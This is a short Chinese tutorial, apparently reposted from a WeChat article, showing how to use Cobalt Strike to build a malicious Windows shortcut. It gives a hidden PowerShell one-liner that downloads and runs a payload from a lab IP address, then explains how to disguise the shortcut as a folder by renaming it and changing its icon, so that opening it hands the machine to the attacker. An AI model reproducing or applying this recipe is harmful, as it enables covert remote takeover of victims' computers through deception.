用到的工具:
Cobalt Strike这个基础用法
我们基于kali的系统,首先打开我们的cs,进行基础配置(监听器之类)
然后我们生成一个链接
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.119.135:80/a'))"我们复制这个代码
第二步,我们到win10目标机器中,创建一个快捷方式
右击桌面选择快捷方式
找到windows中powershell的位置,正常的位置
C:\Windows\System32\WindowsPowerShell\v1.0
然后我们将power shell的位置和上面的木马链接拼接起来
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.119.135:80/a'))"然后我们下一步,命名去掉exe,自己看着伪装
我们还需要更改下图标
右击选择属性
然后我们换一个文件夹的图标,地址在
%SystemRoot%\System32\shell32.dll
点一下确定就会出现这么多,我们根据自己的伪装需要来选择
我们双击打开,kali中的cs很快上线
文章来源: http://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247486443&idx=1&sn=cde31eed5504d09ff4090a9010c31402&chksm=fdb4dcb0cac355a65fede923ecda94ea691dc2f0fb5b6c5341eab45918b5cc79616327ac4757#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh